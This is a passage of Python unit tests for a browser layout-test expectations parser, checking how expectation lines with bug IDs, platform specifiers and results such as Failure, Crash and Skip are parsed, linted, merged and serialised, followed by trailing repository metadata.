self.assert_exp_list('failures/expected/image.html', [CRASH])
def test_overrides__duplicate(self):
self.assert_bad_expectations('Bug(exp) failures/expected/text.html [ Failure ]',
'Bug(override) failures/expected/text.html [ Timeout ]\n'
'Bug(override) failures/expected/text.html [ Crash ]\n')
def test_pixel_tests_flag(self):
def match(test, result, pixel_tests_enabled):
return self._exp.matches_an_expected_result(
test, result, pixel_tests_enabled, sanitizer_is_enabled=False)
self.parse_exp(self.get_basic_expectations())
self.assertTrue(match('failures/expected/text.html', FAIL, True))
self.assertTrue(match('failures/expected/text.html', FAIL, False))
self.assertFalse(match('failures/expected/text.html', CRASH, True))
self.assertFalse(match('failures/expected/text.html', CRASH, False))
self.assertFalse(match('failures/expected/image_checksum.html', PASS, True))
self.assertFalse(match('failures/expected/image_checksum.html', PASS, False))
self.assertFalse(match('failures/expected/crash.html', PASS, False))
self.assertTrue(match('failures/expected/needsrebaseline.html', TEXT, True))
self.assertFalse(match('failures/expected/needsrebaseline.html', CRASH, True))
self.assertTrue(match('failures/expected/needsmanualrebaseline.html', TEXT, True))
self.assertFalse(match('failures/expected/needsmanualrebaseline.html', CRASH, True))
self.assertTrue(match('passes/text.html', PASS, False))
def test_sanitizer_flag(self):
def match(test, result):
return self._exp.matches_an_expected_result(
test, result, pixel_tests_are_enabled=False, sanitizer_is_enabled=True)
self.parse_exp("""
Bug(test) failures/expected/crash.html [ Crash ]
Bug(test) failures/expected/image.html [ Failure ]
Bug(test) failures/expected/text.html [ Failure ]
Bug(test) failures/expected/timeout.html [ Timeout ]
""")
self.assertTrue(match('failures/expected/crash.html', CRASH))
self.assertTrue(match('failures/expected/image.html', PASS))
self.assertTrue(match('failures/expected/text.html', PASS))
self.assertTrue(match('failures/expected/timeout.html', TIMEOUT))
def test_more_specific_override_resets_skip(self):
self.parse_exp('Bug(x) failures/expected [ Skip ]\n'
'Bug(x) failures/expected/text.html [ Failure ]\n')
self.assert_exp('failures/expected/text.html', FAIL)
self.assertNotIn(
self._port.host.filesystem.join(
self._port.layout_tests_dir(),
'failures/expected/text.html'),
self._exp.get_tests_with_result_type(SKIP))
def test_bot_test_expectations(self):
"""Test that expectations are merged rather than overridden when using flaky option 'unexpected'."""
test_name1 = 'failures/expected/text.html'
test_name2 = 'passes/text.html'
expectations_dict = OrderedDict()
expectations_dict['expectations'] = 'Bug(x) %s [ Failure ]\nBug(x) %s [ Crash ]\n' % (test_name1, test_name2)
self._port.expectations_dict = lambda: expectations_dict
expectations = TestExpectations(self._port, self.get_basic_tests())
self.assertEqual(expectations.get_expectations(test_name1), set([FAIL]))
self.assertEqual(expectations.get_expectations(test_name2), set([CRASH]))
def bot_expectations():
return {test_name1: ['PASS', 'TIMEOUT'], test_name2: ['CRASH']}
self._port.bot_expectations = bot_expectations
self._port._options.ignore_flaky_tests = 'unexpected'
expectations = TestExpectations(self._port, self.get_basic_tests())
self.assertEqual(expectations.get_expectations(test_name1), set([PASS, FAIL, TIMEOUT]))
self.assertEqual(expectations.get_expectations(test_name2), set([CRASH]))
class SkippedTests(Base):
def check(self, expectations, overrides, skips, lint=False, expected_results=None):
expected_results = expected_results or [WONTFIX, SKIP, FAIL]
port = MockHost().port_factory.get('test-win-win7')
port.host.filesystem.write_text_file(
port.host.filesystem.join(
port.layout_tests_dir(), 'failures/expected/text.html'),
'foo')
expectations_dict = OrderedDict()
expectations_dict['expectations'] = expectations
if overrides:
expectations_dict['overrides'] = overrides
port.expectations_dict = lambda: expectations_dict
port.skipped_layout_tests = lambda tests: set(skips)
expectations_to_lint = expectations_dict if lint else None
exp = TestExpectations(port, ['failures/expected/text.html'], expectations_dict=expectations_to_lint, is_lint_mode=lint)
self.assertEqual(exp.get_expectations('failures/expected/text.html'), set(expected_results))
def test_skipped_tests_work(self):
self.check(expectations='', overrides=None, skips=['failures/expected/text.html'], expected_results=[WONTFIX, SKIP])
def test_duplicate_skipped_test_fails_lint(self):
self.assertRaises(ParseError, self.check, expectations='Bug(x) failures/expected/text.html [ Failure ]\n',
overrides=None, skips=['failures/expected/text.html'], lint=True)
def test_skipped_file_overrides_expectations(self):
self.check(expectations='Bug(x) failures/expected/text.html [ Failure ]\n', overrides=None,
skips=['failures/expected/text.html'])
def test_skipped_dir_overrides_expectations(self):
self.check(expectations='Bug(x) failures/expected/text.html [ Failure ]\n', overrides=None,
skips=['failures/expected'])
def test_skipped_file_overrides_overrides(self):
self.check(expectations='', overrides='Bug(x) failures/expected/text.html [ Failure ]\n',
skips=['failures/expected/text.html'])
def test_skipped_dir_overrides_overrides(self):
self.check(expectations='', overrides='Bug(x) failures/expected/text.html [ Failure ]\n',
skips=['failures/expected'])
def test_skipped_entry_dont_exist(self):
port = MockHost().port_factory.get('test-win-win7')
expectations_dict = OrderedDict()
expectations_dict['expectations'] = ''
port.expectations_dict = lambda: expectations_dict
port.skipped_layout_tests = lambda tests: set(['foo/bar/baz.html'])
capture = OutputCapture()
capture.capture_output()
TestExpectations(port)
_, _, logs = capture.restore_output()
self.assertEqual('The following test foo/bar/baz.html from the Skipped list doesn\'t exist\n', logs)
def test_expectations_string(self):
self.parse_exp(self.get_basic_expectations())
notrun = 'failures/expected/text.html'
self._exp.add_extra_skipped_tests([notrun])
self.assertEqual('NOTRUN', self._exp.get_expectations_string(notrun))
class ExpectationSyntaxTests(Base):
def test_unrecognized_expectation(self):
self.assert_bad_expectations('Bug(test) failures/expected/text.html [ Unknown ]')
def test_macro(self):
exp_str = 'Bug(test) [ Win ] failures/expected/text.html [ Failure ]'
self.parse_exp(exp_str)
self.assert_exp('failures/expected/text.html', FAIL)
def assert_tokenize_exp(self, line, bugs=None, specifiers=None, expectations=None, warnings=None,
comment=None, name='foo.html', filename='TestExpectations'):
bugs = bugs or []
specifiers = specifiers or []
expectations = expectations or []
warnings = warnings or []
line_number = '1'
expectation_line = TestExpectationLine.tokenize_line(filename, line, line_number)
self.assertEqual(expectation_line.warnings, warnings)
self.assertEqual(expectation_line.name, name)
self.assertEqual(expectation_line.filename, filename)
self.assertEqual(expectation_line.line_numbers, line_number)
if not warnings:
self.assertEqual(expectation_line.specifiers, specifiers)
self.assertEqual(expectation_line.expectations, expectations)
def test_comments(self):
self.assert_tokenize_exp('# comment', name=None, comment='# comment')
self.assert_tokenize_exp('foo.html [ Pass ] # comment', comment='# comment', expectations=['PASS'], specifiers=[])
def test_config_specifiers(self):
self.assert_tokenize_exp('[ Mac ] foo.html [ Failure ] ', specifiers=['MAC'], expectations=['FAIL'])
def test_unknown_config(self):
self.assert_tokenize_exp('[ Foo ] foo.html [ Pass ]', specifiers=['Foo'], expectations=['PASS'],
warnings=['Unrecognized specifier "Foo"'])
def test_unknown_expectation(self):
self.assert_tokenize_exp('foo.html [ Audio ]', warnings=['Unrecognized expectation "Audio"'])
def test_skip(self):
self.assert_tokenize_exp('foo.html [ Skip ]', specifiers=[], expectations=['SKIP'])
def test_slow(self):
self.assert_tokenize_exp('foo.html [ Slow ]', specifiers=[], expectations=['SLOW'],
warnings=['SLOW tests should only be added to SlowTests and not to TestExpectations.'])
self.assert_tokenize_exp('foo.html [ Slow ]', specifiers=[], expectations=['SLOW'], filename='SlowTests')
self.assert_tokenize_exp('foo.html [ Timeout Slow ]', specifiers=[], expectations=['SKIP', 'TIMEOUT'], warnings=[
'Only SLOW expectations are allowed in SlowTests'], filename='SlowTests')
def test_wontfix(self):
self.assert_tokenize_exp(
'foo.html [ WontFix ]', specifiers=[], expectations=['WONTFIX', 'SKIP'], warnings=[
'WONTFIX tests should only be added to NeverFixTests or StaleTestExpectations and not to TestExpectations.'])
self.assert_tokenize_exp(
'foo.html [ WontFix Failure ]', specifiers=[], expectations=['WONTFIX', 'SKIP'], warnings=[
'A test marked Skip or WontFix must not have other expectations.',
'WONTFIX tests should only be added to NeverFixTests or StaleTestExpectations and not to TestExpectations.'])
self.assert_tokenize_exp(
'foo.html [ WontFix Failure ]', specifiers=[], expectations=['WONTFIX', 'SKIP'], warnings=[
'A test marked Skip or WontFix must not have other expectations.',
'Only WONTFIX expectations are allowed in NeverFixTests'], filename='NeverFixTests')
self.assert_tokenize_exp(
'foo.html [ WontFix Timeout ]', specifiers=[], expectations=['WONTFIX', 'TIMEOUT'], warnings=[
'A test marked Skip or WontFix must not have other expectations.',
'Only WONTFIX expectations are allowed in NeverFixTests'], filename='NeverFixTests')
def test_blank_line(self):
self.assert_tokenize_exp('', name=None)
def test_warnings(self):
self.assert_tokenize_exp('[ Mac ]', warnings=['Did not find a test name.', 'Missing expectations.'], name=None)
self.assert_tokenize_exp('[ [', warnings=['unexpected "["', 'Missing expectations.'], name=None)
self.assert_tokenize_exp('crbug.com/12345 ]', warnings=['unexpected "]"', 'Missing expectations.'], name=None)
self.assert_tokenize_exp('foo.html crbug.com/12345 ]',
warnings=['"crbug.com/12345" is not at the start of the line.', 'Missing expectations.'])
self.assert_tokenize_exp('foo.html', warnings=['Missing expectations.'])
class SemanticTests(Base):
def test_bug_format(self):
self.assertRaises(ParseError, self.parse_exp, 'BUG1234 failures/expected/text.html [ Failure ]', is_lint_mode=True)
def test_bad_bugid(self):
try:
self.parse_exp('crbug/1234 failures/expected/text.html [ Failure ]', is_lint_mode=True)
self.fail('should have raised an error about a bad bug identifier')
except ParseError as exp:
self.assertEqual(len(exp.warnings), 3)
def test_missing_bugid(self):
self.parse_exp('failures/expected/text.html [ Failure ]', is_lint_mode=False)
self.assertFalse(self._exp.has_warnings())
try:
self.parse_exp('failures/expected/text.html [ Failure ]', is_lint_mode=True)
except ParseError as exp:
self.assertEqual(exp.warnings, ['expectations:1 Test lacks BUG specifier. failures/expected/text.html'])
def test_skip_and_wontfix(self):
        # Skip is not allowed to be combined with other expectations, because
        # those expectations won't be exercised and may become stale.
self.parse_exp('failures/expected/text.html [ Failure Skip ]')
self.assertTrue(self._exp.has_warnings())
self.parse_exp('failures/expected/text.html [ Crash WontFix ]')
self.assertTrue(self._exp.has_warnings())
self.parse_exp('failures/expected/text.html [ Pass WontFix ]')
self.assertTrue(self._exp.has_warnings())
def test_rebaseline(self):
# Can't lint a file w/ 'REBASELINE' in it.
self.assertRaises(ParseError, self.parse_exp,
'Bug(test) failures/expected/text.html [ Failure Rebaseline ]',
is_lint_mode=True)
def test_duplicates(self):
self.assertRaises(ParseError, self.parse_exp, """
Bug(exp) failures/expected/text.html [ Failure ]
Bug(exp) failures/expected/text.html [ Timeout ]""", is_lint_mode=True)
self.assertRaises(ParseError, self.parse_exp,
self.get_basic_expectations(), overrides="""
Bug(override) failures/expected/text.html [ Failure ]
Bug(override) failures/expected/text.html [ Timeout ]""", is_lint_mode=True)
def test_duplicate_with_line_before_preceding_line(self):
self.assert_bad_expectations("""Bug(exp) [ Debug ] failures/expected/text.html [ Failure ]
Bug(exp) [ Release ] failures/expected/text.html [ Failure ]
Bug(exp) [ Debug ] failures/expected/text.html [ Failure ]
""")
def test_missing_file(self):
self.parse_exp('Bug(test) missing_file.html [ Failure ]')
self.assertTrue(self._exp.has_warnings(), 1)
class PrecedenceTests(Base):
def test_file_over_directory(self):
        # This tests that expectation lines for specific tests take precedence
        # over expectation lines that cover entire directories.
exp_str = """
Bug(x) failures/expected/text.html [ Failure ]
Bug(y) failures/expected [ Crash ]
"""
self.parse_exp(exp_str)
self.assert_exp('failures/expected/text.html', FAIL)
self.assert_exp_list('failures/expected/crash.html', [CRASH])
exp_str = """
Bug(x) failures/expected [ Crash ]
Bug(y) failures/expected/text.html [ Failure ]
"""
self.parse_exp(exp_str)
self.assert_exp('failures/expected/text.html', FAIL)
self.assert_exp_list('failures/expected/crash.html', [CRASH])
def test_ambiguous(self):
self.assert_bad_expectations('Bug(test) [ Release ] passes/text.html [ Pass ]\n'
'Bug(test) [ Win ] passes/text.html [ Failure ]\n')
def test_more_specifiers(self):
self.assert_bad_expectations('Bug(test) [ Release ] passes/text.html [ Pass ]\n'
'Bug(test) [ Win Release ] passes/text.html [ Failure ]\n')
def test_order_in_file(self):
self.assert_bad_expectations('Bug(test) [ Win Release ] : passes/text.html [ Failure ]\n'
'Bug(test) [ Release ] : passes/text.html [ Pass ]\n')
def test_macro_overrides(self):
self.assert_bad_expectations('Bug(test) [ Win ] passes/text.html [ Pass ]\n'
'Bug(test) [ Win7 ] passes/text.html [ Failure ]\n')
class RemoveConfigurationsTest(Base):
def test_remove(self):
host = MockHost()
test_port = host.port_factory.get('test-win-win7', None)
test_port.test_exists = lambda test: True
test_port.test_isfile = lambda test: True
test_config = test_port.test_configuration()
test_port.expectations_dict = lambda: {
'expectations': """Bug(x) [ Linux Win Release ] failures/expected/foo.html [ Failure ]
Bug(y) [ Win Mac Debug ] failures/expected/foo.html [ Crash ]
"""}
expectations = TestExpectations(test_port, self.get_basic_tests())
actual_expectations = expectations.remove_configurations([('failures/expected/foo.html', test_config)])
self.assertEqual("""Bug(x) [ Linux Win10 Release ] failures/expected/foo.html [ Failure ]
Bug(y) [ Win Mac Debug ] failures/expected/foo.html [ Crash ]
""", actual_expectations)
def test_remove_needs_rebaseline(self):
host = MockHost()
test_port = host.port_factory.get('test-win-win7', None)
test_port.test_exists = lambda test: True
test_port.test_isfile = lambda test: True
test_config = test_port.test_configuration()
test_port.expectations_dict = lambda: {'expectations': """Bug(x) [ Win ] failures/expected/foo.html [ NeedsRebaseline ]
"""}
expectations = TestExpectations(test_port, self.get_basic_tests())
actual_expectations = expectations.remove_configurations([('failures/expected/foo.html', test_config)])
self.assertEqual("""Bug(x) [ Win7 Debug ] failures/expected/foo.html [ NeedsRebaseline ]
Bug(x) [ Win10 ] failures/expected/foo.html [ NeedsRebaseline ]
""", actual_expectations)
def test_remove_multiple_configurations(self):
host = MockHost()
test_port = host.port_factory.get('test-win-win7', None)
test_port.test_exists = lambda test: True
test_port.test_isfile = lambda test: True
test_config = test_port.test_configuration()
test_port.expectations_dict = lambda: {'expectations': """Bug(y) [ Win Debug ] failures/expected/foo.html [ Crash ]
Bug(x) [ Win Release ] failures/expected/foo.html [ Failure ]
"""}
expectations = TestExpectations(test_port)
actual_expectations = expectations.remove_configurations([
('failures/expected/foo.html', test_config),
('failures/expected/foo.html', host.port_factory.get('test-win-win10', None).test_configuration()),
])
self.assertEqual("""Bug(y) [ Win Debug ] failures/expected/foo.html [ Crash ]
""", actual_expectations)
def test_remove_line_with_comments(self):
host = MockHost()
test_port = host.port_factory.get('test-win-win7', None)
test_port.test_exists = lambda test: True
test_port.test_isfile = lambda test: True
test_config = test_port.test_configuration()
test_port.expectations_dict = lambda: {'expectations': """Bug(y) [ Win Debug ] failures/expected/foo.html [ Crash ]
# This comment line should get stripped. As should the preceding line.
Bug(x) [ Win Release ] failures/expected/foo.html [ Failure ]
"""}
expectations = TestExpectations(test_port)
actual_expectations = expectations.remove_configurations([('failures/expected/foo.html', test_config)])
actual_expectations = expectations.remove_configurations(
[('failures/expected/foo.html', host.port_factory.get('test-win-win10', None).test_configuration())])
self.assertEqual("""Bug(y) [ Win Debug ] failures/expected/foo.html [ Crash ]
""", actual_expectations)
def test_remove_line_with_comments_at_start(self):
host = MockHost()
test_port = host.port_factory.get('test-win-win7', None)
test_port.test_exists = lambda test: True
test_port.test_isfile = lambda test: True
test_config = test_port.test_configuration()
test_port.expectations_dict = lambda: {'expectations': """
# This comment line should get stripped. As should the preceding line.
Bug(x) [ Win Release ] failures/expected/foo.html [ Failure ]
Bug(y) [ Win Debug ] failures/expected/foo.html [ Crash ]
"""}
expectations = TestExpectations(test_port)
actual_expectations = expectations.remove_configurations([('failures/expected/foo.html', test_config)])
actual_expectations = expectations.remove_configurations(
[('failures/expected/foo.html', host.port_factory.get('test-win-win10', None).test_configuration())])
self.assertEqual("""
Bug(y) [ Win Debug ] failures/expected/foo.html [ Crash ]
""", actual_expectations)
def test_remove_line_with_comments_at_end_with_no_trailing_newline(self):
# TODO(wkorman): Simplify the redundant initialization in every test case.
host = MockHost()
test_port = host.port_factory.get('test-win-win7', None)
test_port.test_exists = lambda test: True
test_port.test_isfile = lambda test: True
test_config = test_port.test_configuration()
test_port.expectations_dict = lambda: {'expectations': """Bug(y) [ Win Debug ] failures/expected/foo.html [ Crash ]
# This comment line should get stripped. As should the preceding line.
Bug(x) [ Win Release ] failures/expected/foo.html [ Failure ]"""}
expectations = TestExpectations(test_port)
actual_expectations = expectations.remove_configurations([('failures/expected/foo.html', test_config)])
actual_expectations = expectations.remove_configurations(
[('failures/expected/foo.html', host.port_factory.get('test-win-win10', None).test_configuration())])
self.assertEqual("""Bug(y) [ Win Debug ] failures/expected/foo.html [ Crash ]""", actual_expectations)
def test_remove_line_leaves_comments_for_next_line(self):
host = MockHost()
test_port = host.port_factory.get('test-win-win7', None)
test_port.test_exists = lambda test: True
test_port.test_isfile = lambda test: True
test_config = test_port.test_configuration()
test_port.expectations_dict = lambda: {'expectations': """
# This comment line should not get stripped.
Bug(x) [ Win Release ] failures/expected/foo.html [ Failure ]
Bug(y) [ Win Debug ] failures/expected/foo.html [ Crash ]
"""}
expectations = TestExpectations(test_port)
actual_expectations = expectations.remove_configurations([('failures/expected/foo.html', test_config)])
actual_expectations = expectations.remove_configurations(
[('failures/expected/foo.html', host.port_factory.get('test-win-win10', None).test_configuration())])
self.assertEqual("""
# This comment line should not get stripped.
Bug(y) [ Win Debug ] failures/expected/foo.html [ Crash ]
""", actual_expectations)
def test_remove_line_no_whitespace_lines(self):
host = MockHost()
test_port = host.port_factory.get('test-win-win7', None)
test_port.test_exists = lambda test: True
test_port.test_isfile = lambda test: True
test_config = test_port.test_configuration()
test_port.expectations_dict = lambda: {'expectations': """
# This comment line should get stripped.
Bug(x) [ Win Release ] failures/expected/foo.html [ Failure ]
# This comment line should not get stripped.
Bug(y) [ Win Debug ] failures/expected/foo.html [ Crash ]
"""}
expectations = TestExpectations(test_port)
actual_expectations = expectations.remove_configurations([('failures/expected/foo.html', test_config)])
actual_expectations = expectations.remove_configurations(
[('failures/expected/foo.html', host.port_factory.get('test-win-win10', None).test_configuration())])
self.assertEqual(""" # This comment line should not get stripped.
Bug(y) [ Win Debug ] failures/expected/foo.html [ Crash ]
""", actual_expectations)
def test_remove_line_keeping_comments_before_whitespace_lines(self):
host = MockHost()
test_port = host.port_factory.get('test-win-win7', None)
test_port.test_exists = lambda test: True
test_port.test_isfile = lambda test: True
test_config = test_port.test_configuration()
test_port.expectations_dict = lambda: {'expectations': """
# This comment line should not get stripped.
# This comment line should get stripped.
Bug(x) [ Win Release ] failures/expected/foo.html [ Failure ]
"""}
expectations = TestExpectations(test_port)
actual_expectations = expectations.remove_configurations([('failures/expected/foo.html', test_config)])
actual_expectations = expectations.remove_configurations(
[('failures/expected/foo.html', host.port_factory.get('test-win-win10', None).test_configuration())])
self.assertEqual("""
# This comment line should not get stripped.
""", actual_expectations)
def test_remove_first_line(self):
host = MockHost()
test_port = host.port_factory.get('test-win-win7', None)
test_port.test_exists = lambda test: True
test_port.test_isfile = lambda test: True
test_config = test_port.test_configuration()
test_port.expectations_dict = lambda: {'expectations': """Bug(x) [ Win Release ] failures/expected/foo.html [ Failure ]
# This comment line should not get stripped.
Bug(y) [ Win Debug ] failures/expected/foo.html [ Crash ]
"""}
expectations = TestExpectations(test_port)
actual_expectations = expectations.remove_configurations([('failures/expected/foo.html', test_config)])
actual_expectations = expectations.remove_configurations(
[('failures/expected/foo.html', host.port_factory.get('test-win-win10', None).test_configuration())])
self.assertEqual(""" # This comment line should not get stripped.
Bug(y) [ Win Debug ] failures/expected/foo.html [ Crash ]
""", actual_expectations)
def test_remove_flaky_line(self):
host = MockHost()
test_port = host.port_factory.get('test-win-win7', None)
test_port.test_exists = lambda test: True
test_port.test_isfile = lambda test: True
test_config = test_port.test_configuration()
test_port.expectations_dict = lambda: {'expectations': """Bug(x) [ Win ] failures/expected/foo.html [ Failure Timeout ]
Bug(y) [ Mac ] failures/expected/foo.html [ Crash ]
"""}
expectations = TestExpectations(test_port)
actual_expectations = expectations.remove_configurations([('failures/expected/foo.html', test_config)])
actual_expectations = expectations.remove_configurations(
[('failures/expected/foo.html', host.port_factory.get('test-win-win10', None).test_configuration())])
self.assertEqual("""Bug(x) [ Win Debug ] failures/expected/foo.html [ Failure Timeout ]
Bug(y) [ Mac ] failures/expected/foo.html [ Crash ]
""", actual_expectations)
class RebaseliningTest(Base):
def test_get_rebaselining_failures(self):
# Make sure we find a test as needing a rebaseline even if it is not marked as a failure.
self.parse_exp('Bug(x) failures/expected/text.html [ Rebaseline ]\n')
self.assertEqual(len(self._exp.get_rebaselining_failures()), 1)
self.parse_exp(self.get_basic_expectations())
self.assertEqual(len(self._exp.get_rebaselining_failures()), 0)
class TestExpectationsParserTests(unittest.TestCase):
def __init__(self, testFunc):
host = MockHost()
test_port = host.port_factory.get('test-win-win7', None)
self._converter = TestConfigurationConverter(test_port.all_test_configurations(),
test_port.configuration_specifier_macros())
unittest.TestCase.__init__(self, testFunc)
self._parser = TestExpectationParser(host.port_factory.get('test-win-win7', None), [], is_lint_mode=False)
def test_expectation_line_for_test(self):
# This is kind of a silly test, but it at least ensures that we don't throw an error.
test_name = 'foo/test.html'
expectations = set(['PASS', 'IMAGE'])
expectation_line = TestExpectationLine()
expectation_line.original_string = test_name
expectation_line.name = test_name
expectation_line.filename = '<Bot TestExpectations>'
expectation_line.line_numbers = '0'
expectation_line.expectations = expectations
self._parser._parse_line(expectation_line)
self.assertEqual(self._parser.expectation_line_for_test(test_name, expectations), expectation_line)
class TestExpectationSerializationTests(unittest.TestCase):
def __init__(self, testFunc):
host = MockHost()
test_port = host.port_factory.get('test-win-win7', None)
self._converter = TestConfigurationConverter(test_port.all_test_configurations(),
test_port.configuration_specifier_macros())
unittest.TestCase.__init__(self, testFunc)
def _tokenize(self, line):
return TestExpectationLine.tokenize_line('path', line, 0)
def assert_round_trip(self, in_string, expected_string=None):
expectation = self._tokenize(in_string)
if expected_string is None:
expected_string = in_string
self.assertEqual(expected_string, expectation.to_string(self._converter))
def assert_list_round_trip(self, in_string, expected_string=None):
host = MockHost()
parser = TestExpectationParser(host.port_factory.get('test-win-win7', None), [], is_lint_mode=False)
expectations = parser.parse('path', in_string)
if expected_string is None:
expected_string = in_string
self.assertEqual(expected_string, TestExpectations.list_to_string(expectations, self._converter))
def test_unparsed_to_string(self):
expectation = TestExpectationLine()
self.assertEqual(expectation.to_string(self._converter), '')
expectation.comment = ' Qux.'
self.assertEqual(expectation.to_string(self._converter), '# Qux.')
expectation.name = 'bar'
self.assertEqual(expectation.to_string(self._converter), 'bar # Qux.')
expectation.specifiers = ['foo']
# FIXME: case should be preserved here but we can't until we drop the old syntax.
self.assertEqual(expectation.to_string(self._converter), '[ FOO ] bar # Qux.')
expectation.expectations = ['bAz']
self.assertEqual(expectation.to_string(self._converter), '[ FOO ] bar [ BAZ ] # Qux.')
expectation.expectations = ['bAz1', 'baZ2']
self.assertEqual(expectation.to_string(self._converter), '[ FOO ] bar [ BAZ1 BAZ2 ] # Qux.')
expectation.specifiers = ['foo1', 'foO2']
self.assertEqual(expectation.to_string(self._converter), '[ FOO1 FOO2 ] bar [ BAZ1 BAZ2 ] # Qux.')
expectation.warnings.append('Oh the horror.')
self.assertEqual(expectation.to_string(self._converter), '')
expectation.original_string = 'Yes it is!'
self.assertEqual(expectation.to_string(self._converter), 'Yes it is!')
def test_unparsed_list_to_string(self):
expectation = TestExpectationLine()
expectation.comment = 'Qux.'
expectation.name = 'bar'
expectation.specifiers = ['foo']
expectation.expectations = ['bAz1', 'baZ2']
# FIXME: case should be preserved here but we can't until we drop the old syntax.
self.assertEqual(TestExpectations.list_to_string([expectation]), '[ FOO ] bar [ BAZ1 BAZ2 ] #Qux.')
def test_parsed_to_string(self):
expectation_line = TestExpectationLine()
expectation_line.bugs = ['Bug(x)']
expectation_line.name = 'test/name/for/realz.html'
expectation_line.parsed_expectations = set([IMAGE])
self.assertIsNone(expectation_line.to_string(self._converter))
expectation_line.matching_configurations = set([TestConfiguration('win7', 'x86', 'release')])
self.assertEqual(expectation_line.to_string(self._converter),
'Bug(x) [ Win7 Release ] test/name/for/realz.html [ Failure ]')
expectation_line.matching_configurations = set(
[TestConfiguration('win7', 'x86', 'release'), TestConfiguration('win7', 'x86', 'debug')])
self.assertEqual(expectation_line.to_string(self._converter), 'Bug(x) [ Win7 ] test/name/for/realz.html [ Failure ]')
def test_parsed_to_string_mac_legacy_names(self):
expectation_line = TestExpectationLine()
expectation_line.bugs = ['Bug(x)']
expectation_line.name = 'test/name/for/realz.html'
expectation_line.parsed_expectations = set([IMAGE])
self.assertIsNone(expectation_line.to_string(self._converter))
expectation_line.matching_configurations = set([TestConfiguration('mac10.10', 'x86', 'release')])
self.assertEqual(expectation_line.to_string(self._converter),
'Bug(x) [ Mac10.10 Release ] test/name/for/realz.html [ Failure ]')
def test_serialize_parsed_expectations(self):
# Testing protected method - pylint: disable=protected-access
expectation_line = TestExpectationLine()
expectation_line.parsed_expectations = set([])
        parsed_expectation_to_string = {
            parsed_expectation: expectation_string
            for expectation_string, parsed_expectation in TestExpectations.EXPECTATIONS.items()}
self.assertEqual(expectation_line._serialize_parsed_expectations(parsed_expectation_to_string), '')
expectation_line.parsed_expectations = set([FAIL])
self.assertEqual(expectation_line._serialize_parsed_expectations(parsed_expectation_to_string), 'fail')
expectation_line.parsed_expectations = set([PASS, IMAGE])
self.assertEqual(expectation_line._serialize_parsed_expectations(parsed_expectation_to_string), 'image pass')
expectation_line.parsed_expectations = set([FAIL, PASS])
self.assertEqual(expectation_line._serialize_parsed_expectations(parsed_expectation_to_string), 'pass fail')
def test_serialize_parsed_specifier_string(self):
# Testing protected method - pylint: disable=protected-access
expectation_line = TestExpectationLine()
expectation_line.bugs = ['garden-o-matic']
expectation_line.parsed_specifiers = ['the', 'for']
self.assertEqual(expectation_line._serialize_parsed_specifiers(self._converter, []), 'for the')
self.assertEqual(expectation_line._serialize_parsed_specifiers(self._converter, ['win']), 'for the win')
expectation_line.bugs = []
expectation_line.parsed_specifiers = []
self.assertEqual(expectation_line._serialize_parsed_specifiers(self._converter, []), '')
self.assertEqual(expectation_line._serialize_parsed_specifiers(self._converter, ['win']), 'win')
def test_format_line(self):
# Testing protected method - pylint: disable=protected-access
self.assertEqual(
TestExpectationLine._format_line(
[], ['MODIFIERS'], 'name', ['EXPECTATIONS'], 'comment'),
'[ MODIFIERS ] name [ EXPECTATIONS ] #comment')
self.assertEqual(
TestExpectationLine._format_line([], ['MODIFIERS'], 'name', ['EXPECTATIONS'], None),
'[ MODIFIERS ] name [ EXPECTATIONS ]')
def test_string_roundtrip(self):
self.assert_round_trip('')
self.assert_round_trip('[')
self.assert_round_trip('FOO [')
self.assert_round_trip('FOO ] bar')
self.assert_round_trip(' FOO [')
self.assert_round_trip(' [ FOO ] ')
self.assert_round_trip('[ FOO ] bar [ BAZ ]')
self.assert_round_trip('[ FOO ] bar [ BAZ ] # Qux.')
self.assert_round_trip('[ FOO ] bar [ BAZ ] # Qux.')
self.assert_round_trip('[ FOO ] bar [ BAZ ] # Qux. ')
self.assert_round_trip('[ FOO ] bar [ BAZ ] # Qux. ')
self.assert_round_trip('[ FOO ] ] ] bar BAZ')
self.assert_round_trip('[ FOO ] ] ] bar [ BAZ ]')
self.assert_round_trip('FOO ] ] bar ==== BAZ')
self.assert_round_trip('=')
self.assert_round_trip('#')
self.assert_round_trip('# ')
self.assert_round_trip('# Foo')
self.assert_round_trip('# Foo')
self.assert_round_trip('# Foo :')
self.assert_round_trip('# Foo : =')
def test_list_roundtrip(self):
self.assert_list_round_trip('')
self.assert_list_round_trip('\n')
self.assert_list_round_trip('\n\n')
self.assert_list_round_trip('bar')
self.assert_list_round_trip('bar\n# Qux.')
self.assert_list_round_trip('bar\n# Qux.\n')
def test_reconstitute_only_these(self):
lines = []
reconstitute_only_these = []
def add_line(matching_configurations, reconstitute):
expectation_line = TestExpectationLine()
expectation_line.original_string = 'Nay'
expectation_line.bugs = ['Bug(x)']
expectation_line.name = 'Yay'
expectation_line.parsed_expectations = set([IMAGE])
expectation_line.matching_configurations = matching_configurations
lines.append(expectation_line)
if reconstitute:
reconstitute_only_these.append(expectation_line)
add_line(set([TestConfiguration('win7', 'x86', 'release')]), True)
add_line(set([TestConfiguration('win7', 'x86', 'release'), TestConfiguration('win7', 'x86', 'debug')]), False)
serialized = TestExpectations.list_to_string(lines, self._converter)
self.assertEqual(serialized, 'Bug(x) [ Win7 Release ] Yay [ Failure ]\nBug(x) [ Win7 ] Yay [ Failure ]')
serialized = TestExpectations.list_to_string(lines, self._converter, reconstitute_only_these=reconstitute_only_these)
self.assertEqual(serialized, 'Bug(x) [ Win7 Release ] Yay [ Failure ]\nNay')
def disabled_test_string_whitespace_stripping(self):
# FIXME: Re-enable this test once we rework the code to no longer support the old syntax.
self.assert_round_trip('\n', '')
self.assert_round_trip(' [ FOO ] bar [ BAZ ]', '[ FOO ] bar [ BAZ ]')
self.assert_round_trip('[ FOO ] bar [ BAZ ]', '[ FOO ] bar [ BAZ ]')
self.assert_round_trip('[ FOO ] bar [ BAZ ] # Qux.', '[ FOO ] bar [ BAZ ] # Qux.')
self.assert_round_trip('[ FOO ] bar [ BAZ ] # Qux.', '[ FOO ] bar [ BAZ ] # Qux.')
self.assert_round_trip('[ FOO ] bar [ BAZ ] # Qux.', '[ FOO ] bar [ BAZ ] # Qux.')
self.assert_round_trip('[ FOO ] bar [ BAZ ] # Qux.', '[ FOO ] bar [ BAZ ] # Qux.')
|
ba7668342c359164efe26311283689b049d6aa57
|
1aa4a01014ff5408c8979d2ee91435515a376bcb
|
/src/ui/SWMM/frmReportOptions.py
|
a82ad0e856993ecc9b6d202be458090ca9586400
|
[] |
no_license
|
USEPA/SWMM-EPANET_User_Interface
|
